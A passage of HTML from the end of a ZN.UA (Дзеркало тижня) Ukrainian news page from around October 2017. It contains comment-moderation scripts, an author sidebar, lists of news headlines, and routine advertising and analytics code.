      $(f).find('[name="id_comment"]').val($(this).attr('rel'));
      $(f).find('[name="action"]').val(action);

      box_dtua2.preloader.show();
      $(f).submit();
    });

    $(document).on('click','#comments_list .comments a.spam',function(){
      var f = $('#comments_block form.update');
      $(f).find('[name="id_comment"]').val($(this).attr('rel'));
      $(f).find('[name="action"]').val('spam');

      box_dtua2.preloader.show();
      $(f).submit();
    });

    $(document).on('click','#comments_block #c_user_auth a.to_hide', function(){
      cua_hide();
    });
  });
</script><div class='article-informer'>
<div id="LentaInformScriptRootN10269" class="news-block-magick">
<div id="LentaInformPreloadN10269">
<a href="https://lentainform.com/" target="_blank">Завантаження...</a>
</div>
<script>
(function(){
var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN10269")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN10269");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=10269;c[ac](dv);
var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/z/n/zn.ua.10269.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
</script>
</div>
</div><div class="banner10" style="margin-bottom:20px">
  <div style="width:580px; height:400px;">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <!-- newZN footer 580x400 -->
    <ins class="adsbygoogle"
        style="display:inline-block;width:580px;height:400px"
        data-ad-client="ca-pub-5515961538037914"
        data-ad-slot="7471714581"></ins>
    <script>
    (adsbygoogle = window.adsbygoogle || []).push({});
    </script>
  </div>
</div>
              <div class='clear'></div>
            </div>
          <!--#block_left [END]-->

          <!--#block_right [START]-->
            <div id='right'>
              <div class='authors_block'>
    <ul class='authors_imgs'>
      
        <li class='auth_img'>
          <a class='' href='/author/nataliya-mihaylenko'>
            <img class='img' src='//image.zn.ua/media/images/300x250/Jun2017/177609.jpg' alt='Наталія Михайленко'>
          </a>
        </li>
      
    </ul>
    <div class='auth_info'>
      <span class='info_title'>
        Автор
      </span>
      <ul class='auth_list'>
        
          <li class='auth_item'>
            <a class='auth_link' href='/author/nataliya-mihaylenko'>
              <span class='name'>
                Наталія Михайленко
              </span>
              <span class='post'>
                Наталія Михайленко - психолог "Дитячого реабілітаційного центру" у м.Охтирка
              </span>
            </a>
          </li>
        
      </ul>
      <div class='auth_articles_block'>
        <span class='auth_articles_list_title'>
          Статті автора
        </span>
        <ul class='auth_articles_list'>
        
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/giperaktivnist-yak-vizhiti-z-legkoyu-ne-normoyu-253520_.html'>
              <span class='title'>
                Гіперактивність: як вижити з легкою не нормою
              </span>
              <span class='summary'>
                Життя гіперактивних дітей нелегке. Вони воюють не тільки з власним нездоров'ям, а й з осудом оточуючих.
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/radyanskiy-spadok-abo-chomu-rozruha-u-nas-v-golovi-251636_.html'>
              <span class='title'>
                Радянський спадок,   або Чому розруха  у нас в голові
              </span>
              <span class='summary'>
                Радянський спадок,   
 або Чому розруха  у нас в голові
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/chomu-diti-ne-hochut-doroslishati-248443_.html'>
              <span class='title'>
                Чому діти не хочуть дорослішати
              </span>
              <span class='summary'>
                Виховання самостійності.
              </span>
            </a>
            </li>
          
        </ul>
        
          <a class='auth_button' href='/author/nataliya-mihaylenko'>
            Всі статті автора
          </a>
        
        <a class='auth_button' href='/authors'>
          Всі автори
        </a>
      </div>
    </div>
  </div><div class="banner1">
<!--  AdRiver code START. Type:AjaxJS Site: ZN PZ: 0 BN: 1 -->
<div id="adriver_banner_71440337"></div>
<script type="text/javascript">
new adriver("adriver_banner_71440337", {sid:161943, bt:52, bn:2});
</script>
<!--  AdRiver code END  -->
</div><div class='left_socials'>
  <span class='caption center'>Читайте нас у соцмережах</span>
  <ul class='social_list'>
    <li class='social_item'>
      <a class='social_link fb' href='https://www.facebook.com/ZN.UA.Official' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link tw' href='https://twitter.com/zn_ua' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link gp' href='https://plus.google.com/+ZnUaOfficial/posts' target="_blank"></a>
    </li>
    <li class='social_item'>
      <a class='social_link tg' href='https://t.me/ZerkaloNedeliBot' target="_blank"></a>
    </li>
  </ul>
</div>
<div style="clear: both"></div><div class='left_news_list right '>
  <a class='caption center' href=''>Останні новини</a>
  <ul class='news_list'>
    
    <li class='news_item'>
      <a class='news_link' href='/WORLD/rosiya-vikoristovuye-markistski-strategiyi-yak-i-tramp-bloomberg-view-257593_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Росія використовує марксистські стратегії, як і Трамп - Bloomberg View</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>17:38</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/UKRAINE/advokat-zaycevoyi-zvinuvachuye-v-dtp-u-harkovi-vodiya-volkswagen-257591_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Адвокат Зайцевої звинувачує в ДТП у Харкові водія Volkswagen</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>17:31</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/WORLD/dodona-pozbavili-prava-priznachiti-ministra-oboroni-moldovi-257589_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Додона позбавили права призначити міністра оборони Молдови</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>17:27</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/UKRAINE/opublikovano-nove-video-smertelnoyi-dtp-u-harkovi-257592_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Опубліковано нове відео смертельної ДТП у Харкові</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>17:22</span>
      </a>
    </li>
    
    <li class='news_item'>
      <a class='news_link' href='/SPORT/svitolina-otrimala-supernic-po-grupi-na-pidsumkovomu-turniri-wta-257590_.html'>
        
        <span class='news_anounce'>
          
          <span class='news_title'>Світоліна отримала суперниць по групі на Підсумковому турнірі WTA</span>
          
          
          
          
          
          
          
          
          
          
          
        </span>
        <span class='news_date'>17:21</span>
      </a>
    </li>
    
  </ul>
  
  <div class='more'>
    <div class='over'></div>
    <a class='link' href='/all-news'>Усі новини</a>
  </div>
  
</div>

<div style="clear: both"></div><div class="banner2">
  <div id="MIXADV_2408" class="MIXADVERT_NET"></div>
  <script type="text/javascript" src="https://m.mixadvert.com/show/?id=2408" async ></script>

  <!-- /17774365/zn.ua -->
  <div id='div-gpt-ad-1461742398816-0' style='height:250px; width:300px;'>
    <script type='text/javascript'>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1461742398816-0'); });
    </script>
  </div>
</div><div class="banner5">
  <div id="MIXADV_2407" class="MIXADVERT_NET"></div>
  <script type="text/javascript" src="https://m.mixadvert.com/show/?id=2407"></script>
</div><div id='left_news_list_article' class='left_news_list right other'>
  <span class='caption center'>Новини інших ресурсів</span>
<div id="traffim-widget-921"></div>
  <script language="javascript" type="text/javascript">
    (function() {
      var useSSL = 'https:' == document.location.protocol;
      var traffim = document.createElement('script');
      traffim.type = 'text/javascript'; traffim.async = true;traffim.charset = 'UTF-8';
      traffim.src = (useSSL ? 'https:' : 'http:') + '//ua.traffim.com/load/921.js';
      var nrvrscr = document.getElementsByTagName('script')[0];
      nrvrscr.parentNode.insertBefore(traffim, nrvrscr);
    })();
  </script>
</div>

<script type='text/javascript'>
  $(document).ready(function(){

    var distanceTop_fix = $('#left_news_list_article').offset().top + 1250;
    var comment_height = $('#comments_block').outerHeight();
    var distanceTop_abs = $('#comments_block').offset().top + comment_height - 530;

    $(window).scroll(function(){
      try {
        var pos = parseInt( $( window ).scrollTop() );

        if (pos > distanceTop_fix) {
          $('#left_news_list_article').addClass('fixed');
          $('#left_news_list_article').css({'top': '5px'});
          }
        else {
          $('#left_news_list_article').removeClass('fixed');
        }
        if (pos > distanceTop_abs) {
          $('#left_news_list_article').addClass('abs');
          $('#left_news_list_article').css({'top': distanceTop_abs+'px'});
          }
        else {
          $('#left_news_list_article').removeClass('abs');
          $('#left_news_list_article').css({'top':'40px'});
        }
      }
      catch(e) {
      }
    });
  });
</script>
              <div class='clear'></div>
            </div>
          <!--#block_right [END]-->
        </div>
      </div>
      <div class='clear'></div>

      <!--#block_bottom_full_width [START]-->
        <script>
  $(function(){
    $("#newspaper").owlCarousel({
      responsive:{
        0:{
            items:3
        },
        1024:{
            items:3
        },
        1250:{
            items:4
        }
      }

    });

  });
</script>
<div class='index_news_list wide'>
  <div class='index_item wide newspaper' >
    <span class='top_block'>
      <a class='logo' href='/gazeta/issue/1125'>
        <span class='name'>ДЗЕРКАЛО ТИЖНЯ. УКРАЇНА</span>
        <span class='corner'><span>
      </a>
      <a class='issue' href='/gazeta/issue/1125'><span>Випуск №38, 14 жовтня-20 жовтня</span></a>
      <a class='button' href='/gazeta/archive/'>Архів номерів</a>
      <span class='divider'>|</span>
      <a class='button' href='/gazeta/issue/1125'>Зміст номеру</a>
      <span class='navigator'>
        <span class='prev'><</span>
        <span class='next'>></span>
      </span>
    </span>
    <ul id='newspaper' class='grid_list main_news_list'>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/macrolevel/na-morozi-256934_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Oct2017/186924.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/macrolevel/na-morozi-256934_.html'>
            <span class='news_title'>
              
              На морозі
            </span>
            <span class='news_summary'>Що несе нам новий опалювальний сезон.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>13.10 16:59</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/yuliya-samaeva'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/May2016/148200.jpg' alt='Юлiя Самаєва' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/yuliya-samaeva'>Юлiя Самаєва</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/international/koncept-regionalnogo-bloku-v-centralno-shidniy-yevropi-256966_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Oct2017/187058.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/international/koncept-regionalnogo-bloku-v-centralno-shidniy-yevropi-256966_.html'>
            <span class='news_title'>
              
              Концепт регіонального блоку в Центрально-Східній Європі
            </span>
            <span class='news_summary'>Три держави Східної Європи, як і раніше, залишені сам на сам у своїх протистояннях із Москвою. </span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>13.10 18:25</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/andreas__umland'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Feb2013/54055.jpg' alt='Андреас Умланд' />
            </a>
            
            <a class='int_auth_img' href='/author/konstantin-fedorenko'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Jul2015/120406.jpg' alt='Костянтин Федоренко' />
            </a>
            
            <span class='auth_name'><b>Автори</b><br />
            
              <a class='int_auth_name' href='/author/andreas__umland'>Андреас Умланд,</a><br />
            
              <a class='int_auth_name' href='/author/konstantin-fedorenko'>Костянтин Федоренко</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/personalities/ledi-tetcher-cina-triumfu-256946_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Oct2017/186969.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/personalities/ledi-tetcher-cina-triumfu-256946_.html'>
            <span class='news_title'>
              
              Леді Тетчер: ціна тріумфу
            </span>
            <span class='news_summary'>Її жіночу привабливість оцінював чоловік — і то не власний, а чужий. </span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>13.10 17:38</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/ariadna-voytko'>
              <img class='auth_img' src='/static/img/author-place-holder.jpg' alt='Аріадна Войтко' />
            </a>
            
            <span class='auth_name'><b>Автор:</b><br />
            
              <a class='int_auth_name' href='/author/ariadna-voytko'>Аріадна Войтко</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      
      <li class='column x1x2 news_item full'>
        <span class='news_link'>
          <a href='/ART/diti-virosli-top-15-perspektivnih-ukrayinskih-aktoriv-novogo-kino-256945_.html'>
            <img class='news_img' src='//image.zn.ua/media/images/300x250/Oct2017/186950.jpg' alt='' />
          </a>
          <a class='news_anounce' href='/ART/diti-virosli-top-15-perspektivnih-ukrayinskih-aktoriv-novogo-kino-256945_.html'>
            <span class='news_title'>
              <span class='news_zn'></span> 
              Діти виросли. Топ-15 перспективних українських акторів нового кіно
            </span>
            <span class='news_summary'>Молодих талановитих акторів — чимало. Деякі з них уже гучно заявили про себе. У деяких — ще все попереду.</span>
            
            
            
            
            
            
            
            
            
            
            
            <span class='news_date'>15.10 11:54</span>
          </a>
          <span class='author'>
            
            <a class='int_auth_img' href='/author/oleg__vergelis2'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Apr2016/145858.jpg' alt='Олег Вергеліс' />
            </a>
            
            <a class='int_auth_img' href='/author/alla-samoylenko'>
              <img class='auth_img' src='//image.zn.ua/media/images/300x250/Oct2017/187278.jpg' alt='Алла Самойленко' />
            </a>
            
            <span class='auth_name'><b>Автори</b><br />
            
              <a class='int_auth_name' href='/author/oleg__vergelis2'>Олег Вергеліс,</a><br />
            
              <a class='int_auth_name' href='/author/alla-samoylenko'>Алла Самойленко</a><br />
            
            </span>
          </span>
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
        </span>
      </li>
      

    </ul>
  </div>
</div><div class='left_news_list section bottom'>
  <span class='caption left'>Вам також буде цікаво</span>
  <span class='caption_line'></span>
  <ul class='news_list'>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/ART/kinofestival-molodist-anonsuye-dvi-chervoni-dorizhki-256952_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/187032.jpg' alt='Кадр з фільму &quot;Межа&quot;' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/ART/kinofestival-molodist-anonsuye-dvi-chervoni-dorizhki-256952_.html'>
            <span class='news_zn'></span> 
            Кінофестиваль &quot;Молодість&quot; анонсує дві червоні доріжки
          </a>
          <a class='news_summary'  href='/ART/kinofestival-molodist-anonsuye-dvi-chervoni-dorizhki-256952_.html'><p>У рамках спеціального показу буде представлений новий фільм "Межа".</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/dmitriy-levickiy'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Jul2017/179435.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/dmitriy-levickiy'>Дмитро Левицький</a>
          
            <a class='button' href='/ART/kinofestival-molodist-anonsuye-dvi-chervoni-dorizhki-256952_.html'>Читати статтю</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>15.10 13:09</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/macrolevel/promin-optimizmu-mvf-kriz-tuman-svitovoyi-ekonomiki-257403_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/187557.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/macrolevel/promin-optimizmu-mvf-kriz-tuman-svitovoyi-ekonomiki-257403_.html'>
            <span class='news_zn'></span> 
            Промінь оптимізму МВФ крізь туман світової економіки
          </a>
          <a class='news_summary'  href='/macrolevel/promin-optimizmu-mvf-kriz-tuman-svitovoyi-ekonomiki-257403_.html'><p>При темпах зростання в 2% Україна дедалі більше — майже удвічі — відстає від зростання світової економіки.</p>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/aleksandr-petrik'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Jun2017/178118.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/aleksandr-petrik'>Олександр Петрик</a>
          
            <a class='button' href='/macrolevel/promin-optimizmu-mvf-kriz-tuman-svitovoyi-ekonomiki-257403_.html'>Читати статтю</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>19.10 10:42</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/EDUCATION/oleg-sharov-pri-vstupi-bude-bilshe-matematiki-fiziki-himiyi-ta-inozemnoyi-movi-257579_.html'>
          <img class='news_list_img' src='/blank.gif' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/EDUCATION/oleg-sharov-pri-vstupi-bude-bilshe-matematiki-fiziki-himiyi-ta-inozemnoyi-movi-257579_.html'>
            
            Олег Шаров: &quot;При вступі буде більше математики, фізики, хімії та іноземної мови&quot;
          </a>
          <a class='news_summary'  href='/EDUCATION/oleg-sharov-pri-vstupi-bude-bilshe-matematiki-fiziki-himiyi-ta-inozemnoyi-movi-257579_.html'>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/oksana-onischenko'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Jul2017/180632.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/oksana-onischenko'>Оксана Онищенко</a>
          
            <a class='button' href='/EDUCATION/oleg-sharov-pri-vstupi-bude-bilshe-matematiki-fiziki-himiyi-ta-inozemnoyi-movi-257579_.html'>Читати статтю</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>16:55</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/family/yak-zminiti-sviy-finansoviy-scenariy-257571_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/187700.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/family/yak-zminiti-sviy-finansoviy-scenariy-257571_.html'>
            
            Як змінити свій фінансовий сценарій
          </a>
          <a class='news_summary'  href='/family/yak-zminiti-sviy-finansoviy-scenariy-257571_.html'>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/anastasiya-suhorukova'>
              <img class='auth_img_img' src='//image.zn.ua/media/images/300x250/Sep2017/184800.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/anastasiya-suhorukova'>Анастасія Сухорукова</a>
          
            <a class='button' href='/family/yak-zminiti-sviy-finansoviy-scenariy-257571_.html'>Читати статтю</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>16:36</span>
        </span>
      </span>
    </li>
    
    <li class='news_item article'>
      <span class='news_link'>
        <a class='img_cont'  href='/personalities/toy-gorbachov-scho-gornyeye-vbachaye-257573_.html'>
          <img class='news_list_img' src='//image.zn.ua/media/images/300x250/Oct2017/187701.jpg' alt='' />
        </a>
        <span class='news_anounce'>
          <a class='news_title'  href='/personalities/toy-gorbachov-scho-gornyeye-vbachaye-257573_.html'>
            
            Той Горбачов,  що горнєє вбачає
          </a>
          <a class='news_summary'  href='/personalities/toy-gorbachov-scho-gornyeye-vbachaye-257573_.html'>
            
            
            
            
            
            
            
            
            
            
            
          </a>
          <span class='author'>
          
            <a  class='auth_img' href='/author/olga-samolevska'>
              <img class='auth_img_img' src='/static/img/author-place-holder.jpg' alt='' />
            </a>
            <a class='auth_name'  href='/author/olga-samolevska'>Ольга Самолевська</a>
          
            <a class='button' href='/personalities/toy-gorbachov-scho-gornyeye-vbachaye-257573_.html'>Читати статтю</a>
          </span>
          
          <span class='type'>
            <span class='type_name'>Стаття</span>
            <span class='type_corner'></span>
          </span>
          
          <span class='news_date'>16:38</span>
        </span>
      </span>
    </li>
    
  </ul>
</div>
<div style="clear: both"></div>
      <!--#block_bottom_full_width [END]-->

      <div class='clearfix'></div>
      <!--#container [END]-->
    </div>
    <!--#wrapper [END] -->
    <!--#footer [START]-->
      <div id='footer'>
          <div class='container'>
  <div class='info_block'>
    <a class='bottom_logo' href='/'></a>
    <div class='copyright'>
      <p>Використання матеріалів «ZN.UA» дозволяється за умови посилання на «ZN.UA».</p>
        <p>Для інтернет-видань обов’язкове пряме, відкрите для пошукових систем гіперпосилання у першому абзаці на конкретний матерал.</p>
        <p>Усі матеріали, розташовані на цьому сайті з посиланням на агентство «Інтерфакс-Україна», не підлягають наступному відтворенню та/або розповсюдженню у будь-якій формі без письмового дозволу агентства «Інтерфакс-Україна».</p>
        <p>Матеріали у блоці "Новини компаній" публікуються на правах реклами.</p>
      <a href="/?version=mobile" class="">Мобільна версія</a>
      <a href="https://old.zn.ua" class="">Стара версія</a>
      <span class='terms'>
        © 1994–2017 «Дзеркало тижня. Україна». Усе права застережено.
      </span>
    </div>
  </div>
  <div class='bottom_menu'>
    <span class='name'>Рубрики</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <a class='link' href='/POLITICS'>Політика</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/ECONOMICS'>Економіка</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/UKRAINE'>Україна</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/WORLD'>Світ</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/TECHNOLOGIES'>Технології</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/CULTURE'>Культура</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/SPORT'>Спорт</a>
      </li>
    
    </ul>
  </div>
  <div class='bottom_menu'>
    <span class='name'>Видання</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <a class='link' href='/gazeta/issue/1125'>Газета</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/gazeta/archive/'>Архів номерів</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/reklama'>Реклама</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/redaction'>Редакція</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='//dt.ua/sitemap/text/index.html'>Карта</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/fond'>Підтримати ZN</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='/podpiska'>Передплата</a>
      </li>
    
    </ul>
  </div>
  <div class='bottom_menu wide'>
    <span class='name'>Контакти</span>
    <ul class='menu'>
    
      <li class='menu_item'>
        <span class='link' href=''>01010 Київ, вул. Московска, 19/1</span>
      </li>
    
      <li class='menu_item'>
        <span class='link' href=''>Телефон: +380 (44) 280-04-85 </span>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='mailto:zn94@ukr.net'>Електронна пошта редакції: zn94@ukr.net</a>
      </li>
    
      <li class='menu_item'>
        <a class='link' href='mailto:editor@zn.ua'>Електронна пошта служби новин: editor@zn.ua</a>
      </li>
    
    </ul>
  </div>
  <div class='clear'></div>
  <div class='counters'>
  <!-- Google Analitycs [START] -->
  <script type="text/javascript">
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-3006560-9']);
    _gaq.push(['_setDomainName', 'dt.ua']);
    _gaq.push(['_trackPageview']);
    (function() {
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
  </script>
  <!-- Google Analitycs [END] -->

    <!--bigmir)net TOP 100-->
    <script type="text/javascript" language="javascript"><!--
    bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:3250,s:3250,t:33,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
    for(f=self;f!=f.parent;f=f.parent)bm.w++;
    try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|s)+/,''));
    else for(f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
    try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
    try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
    r=bmD.referrer.slice(7);if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r);bm.v^=r.length}
    bm.v^=window.location.href.length;for(x in bm)bs[i++]=x+bm[x];
    bmD.write('<a href="//www.bigmir.net/" target="_blank" onClick="img=new Image();img.src=&quot;//www.bigmir.net/?cl=3250&quot;;"><img src="//c.bigmir.net/?'+bs.join('&')+'"  width="160" height="19" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
    //-->
    </script>
    <!--bigmir)net TOP 100-->

    <!--LiveInternet counter-->
    <script type="text/javascript"><!--
    document.write("<a href='//www.liveinternet.ru/click' "+
    "target=_blank><img src='//counter.yadro.ru/hit?t39.6;r"+
    escape(document.referrer)+((typeof(screen)=="undefined")?"":
    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
      screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
      ";"+Math.random()+
      "' alt='' title='LiveInternet' "+
      "border='0' width='31' height='31'><\/a>")
      //--></script>
    <!--/LiveInternet-->

  </div>
  <div class='clear'></div>

</div>
<!—  AdRiver code START. Type:AjaxJS Site: ZN BN:4 —>
<div id="adriver_banner_1454520882"></div>
<script type="text/javascript">
new adriver("adriver_banner_1454520882", {sid:161943, bt:52, bn:4});
</script>
<!—  AdRiver code END  —>
      </div>
      <!--#footer [END]-->

    <!--detect AD_block [START]-->
    <!-- The Modal -->
    <div id="myModal" class="modal">
      <!-- Modal content -->
      <div class="modal-content">
        <span class="close">&times;</span>
        <p>За нами немає олігархів.</p>
        <p>Ми існуємо за рахунок реклами.</p>
        <p>Вимкніть AdBlock</p>
      </div>
    </div>

    <script src="/static/js/ads.js" type="text/javascript"></script>
    <script type="text/javascript">
      var modal = document.getElementById('myModal');
      var span = document.getElementsByClassName("close")[0];
//      $(document).ready(function() {
        if(!document.getElementById('g74jH6y7')){
          modal.style.display = "block";
        }
        span.onclick = function() {
          modal.style.display = "none";
        }
        window.onclick = function(event) {
          if (event.target == modal) {
            modal.style.display = "none";
          }
        }
//      });
      </script>
    <!--detect AD_block [END]-->

  

<script language="JavaScript" type="text/javascript" src="/static/js/xgemius.js"></script>
<script type='text/javascript'>document.write('<img src="//dt.ua/svc/stat/?svc_1='+R_ID+'&svc_2='+S_ID+'&svc_3='+A_ID+'&ac='+Math.random()+'" border="0" width="1" height="1" style="width:0; height:0;" />');</script>
</body>

</html>